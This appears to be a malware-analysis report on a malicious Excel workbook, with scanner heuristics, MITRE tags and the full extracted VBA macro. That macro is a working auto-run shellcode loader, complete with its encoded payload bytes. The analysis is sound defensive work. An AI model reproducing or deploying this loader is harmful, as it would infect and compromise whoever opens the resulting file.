MALICIOUS
108
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The Workbook_Open macro indicates that the malicious code executes automatically when the Excel file is opened. The VBA script uses VirtualAlloc and WriteProcessMemory APIs to allocate memory and write shellcode, which is then executed via CreateThread. This pattern suggests the file is designed to download and execute a secondary payload.
Heuristics 4
-
Reference to WriteProcessMemory API critical SC_STR_WRITEPROCESSMEMORYReference to WriteProcessMemory API
-
Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOCReference to VirtualAlloc API
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Sub Workbook_Open()
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5357 bytes |
SHA-256: 5be0ec23aa6a80a1316577461de68386507487e0f52adc691c9ab9bf2d7aee07 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Declare Function VirtualAlloc Lib "KERNEL32" (ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long
Private Declare Function WriteProcessMemory Lib "KERNEL32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal lpBuffer As String, ByVal dwSize As Long, ByRef lpNumberOfBytesWritten As Long) As Integer
Private Declare Function CreateThread Lib "KERNEL32" (ByVal lpThreadAttributes As Long, ByVal dwStackSize As Long, ByVal lpStartAddress As Long, ByVal lpParameter As Long, ByVal dwCreationFlags As Long, ByRef lpThreadId As Long) As Long
Const MEM_COMMIT = &H1000
Const PAGE_EXECUTE_READWRITE = &H40
Private Sub ExecuteShellCode()
Dim lpMemory As Long
Dim sShellCode As String
Dim lResult As Long
sShellCode = ShellCode()
lpMemory = VirtualAlloc(0&, Len(sShellCode), MEM_COMMIT, PAGE_EXECUTE_READWRITE)
lResult = WriteProcessMemory(-1&, lpMemory, sShellCode, Len(sShellCode), 0&)
lResult = CreateThread(0&, 0&, lpMemory, 0&, 0&, 0&)
End Sub
Private Function ParseBytes(strBytes) As String
Dim aNumbers
Dim sShellCode As String
Dim iIter
sShellCode = ""
aNumbers = Split(strBytes)
For iIter = LBound(aNumbers) To UBound(aNumbers)
sShellCode = sShellCode + Chr(aNumbers(iIter))
Next
ParseBytes = sShellCode
End Function
Private Function ShellCode1() As String
Dim sShellCode As String
sShellCode = ""
sShellCode = sShellCode + ParseBytes("184 230 17 158 154 218 208 217 116 36 244 93 49 201 177 99 131 237 252 49 69 17 3")
sShellCode = sShellCode + ParseBytes("69 17 226 19 202 66 32 213 34 62 158 48 200 155 212 156 24 45 165 125 106 251 209")
sShellCode = sShellCode + ParseBytes("126 218 20 93 72 41 188 95 65 187 62 42 196 173 152 74 250 0 162 160 29 135 89 246")
sShellCode = sShellCode + ParseBytes("15 198 151 196 223 189 82 119 57 35 32 169 229 12 231 80 212 84 223 61 218 66 6 139")
sShellCode = sShellCode + ParseBytes("32 209 100 177 50 242 220 226 92 153 176 40 148 82 71 36 164 219 240 53 120 223 59")
sShellCode = sShellCode + ParseBytes("29 16 249 221 197 221 157 119 119 121 100 125 143 123 188 167 87 19 201 78 170 254")
sShellCode = sShellCode + ParseBytes("186 147 192 239 98 96 249 161 41 98 116 108 9 140 222 251 65 5 203 62 108 70 44 104")
sShellCode = sShellCode + ParseBytes("75 115 36 83 4 77 109 150 236 26 83 166 101 248 150 75 132 108 115 45 226 255 171")
sShellCode = sShellCode + ParseBytes("139 191 173 105 255 40 182 58 48 32 117 32 117 253 183 23 164 24 198 78 135 177 79")
sShellCode = sShellCode + ParseBytes("80 10 41 232 154 166 79 99 252 253 46 130 214 129 24 166 17 13 202 41 175 249 123")
sShellCode = sShellCode + ParseBytes("187 169 39 234 146 194 219 140 128 49 21 138 128 252 162 210 28 76 209 150 213 174")
sShellCode = sShellCode + ParseBytes("196 34 158 102 130 195 112 17 226 28 90 133 102 137 130 33 201 114 140 231 162 31")
sShellCode = sShellCode + ParseBytes("78 240 54 59 139 32 83 45 219 187 166 239 108 117 195 243 129 42 197 230 205 36 158")
sShellCode = sShellCode + ParseBytes("253 212 4 157 152 159 153 107 67 122 232 95 217 97 245 194 225 52 98 223 112 103 227")
sShellCode = sShellCode + ParseBytes("127 142 9 215 67 174 238 234 208 11 103 20 201 146 61 230 250 83 87 195 32 39 223")
sShellCode = sShellCode + ParseBytes("146 104 42 73 47 152 127 71 157 247 19 32 216 112 115 105 184 139 13 168 57 12 11")
sShellCode = sShellCode + ParseBytes("243 10 199 16 153 203 94 231 16 198 214 155 125 171 157 176 214 181 212 201 226 186")
sShellCode = sShellCode + ParseBytes("11 125 89 198 25 131 109 9 133 211 157 250 6 78 13 140 111 92 2 219 168 18 59 80 227")
sShellCode = sShellCode + ParseBytes("47 213 195 156 172 110 149")
ShellCode1 = sShellCode
End Function
Private Function ShellCode() As String
Dim sShellCode As String
sShellCode = ""
sShellCode = sShellCode + ShellCode1()
ShellCode = sShellCode
End Function
Sub Workbook_Open()
ExecuteShellCode
End Sub
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.